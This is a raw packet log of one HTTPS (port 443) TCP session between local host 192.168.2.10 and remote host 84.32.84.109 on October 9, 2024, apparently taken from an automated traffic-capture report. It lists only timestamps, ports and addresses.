Oct 9, 2024 16:16:03.774401903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.774406910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.774426937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.774430037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.774476051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.774481058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.774514914 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.775850058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.775902987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.775908947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.775952101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.776814938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.776926041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.776945114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.776952028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.776969910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.776988029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.778032064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.778153896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.778156996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.778163910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.778187990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.778213024 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.778217077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.778235912 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.778271914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.778307915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.778314114 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.778348923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.779301882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.779346943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.779365063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.779371023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.779393911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.779452085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.780951023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.781032085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.781038046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.781258106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.782934904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.783094883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.783109903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.783165932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.784384966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.784455061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.784465075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.784470081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.784513950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.784576893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.784590006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.784643888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.784658909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.784672022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.784773111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.784981966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.785049915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.785079002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.785193920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.838943958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.839020014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.839066029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.839071035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.839081049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.839135885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.839135885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.839150906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.839179039 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.839198112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.860672951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.860750914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.860780954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.860789061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.860816002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.860821009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.860838890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.860845089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.860867977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.860897064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.860937119 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.860941887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.860977888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.861650944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.861711025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.861711025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.861721992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.861752033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.861850977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.861885071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.861903906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.861910105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.861921072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.861948013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.863801003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.863866091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.863889933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.863895893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.863909960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.863929033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.864556074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.864610910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.864643097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.864694118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.865722895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.865778923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.865832090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.865880013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.865895033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.865942001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.865957022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.866012096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.867017984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.867088079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.867213011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.867265940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.868916988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.868998051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.869004011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.869016886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.869086981 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.870683908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.870753050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.870762110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.870807886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873191118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873260021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873294115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873356104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873362064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873374939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873406887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873420000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873429060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873449087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873464108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873531103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873560905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873584032 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873590946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.873615980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.873639107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.927783012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.927843094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.927884102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.927906036 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.927917957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.927932024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.927952051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.927975893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.927982092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.928055048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.966648102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966708899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966739893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966773033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966792107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.966799974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966814041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966862917 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.966875076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966886997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966938019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.966944933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.966979980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967005014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967041969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967051029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967058897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967081070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967093945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967093945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967101097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967123032 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967264891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967303991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967308998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967317104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967333078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967348099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967358112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967371941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967374086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967391968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967401028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967417002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967591047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967629910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967638969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967649937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967673063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967683077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967693090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967709064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967727900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967742920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967752934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967776060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967782974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967861891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967866898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.967900991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.967966080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968005896 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968013048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968024015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968039989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968044996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968053102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968063116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968075991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968091011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968120098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968125105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968158007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968254089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968281984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968297005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968305111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968319893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968334913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968434095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968476057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968478918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968487978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968513966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968514919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968533993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.968539953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.968554974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.015791893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.015842915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.015885115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.015918970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.015940905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.015954971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.015997887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.053527117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.053611040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.053667068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.053668022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.053695917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.053705931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.053730011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.053741932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.053832054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.053879976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.053929090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.053982973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054085970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054117918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054141998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054148912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054158926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054191113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054265976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054307938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054327011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054342031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054349899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054384947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054408073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054462910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054506063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054533005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054563046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054567099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054577112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054738998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054790974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054797888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054843903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054868937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054907084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054928064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054934025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054946899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.054960966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054971933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.054975986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055010080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055229902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055273056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055285931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055294991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055308104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055311918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055341005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055362940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055370092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055391073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055444956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055483103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055494070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055504084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055521965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055535078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055551052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055572987 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055579901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055605888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055879116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055937052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.055943966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.055985928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.058377981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.058434963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.058465004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.058470964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.058484077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.058505058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.058532000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.103080988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.103157043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.103183985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.103192091 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.103209972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.103244066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.103260040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.103272915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.103323936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141202927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141268015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141299009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141324043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141336918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141360044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141382933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141424894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141469955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141474962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141484022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141510963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141524076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141674042 CEST	443	49723	84.32.84.109	192.168.2.10
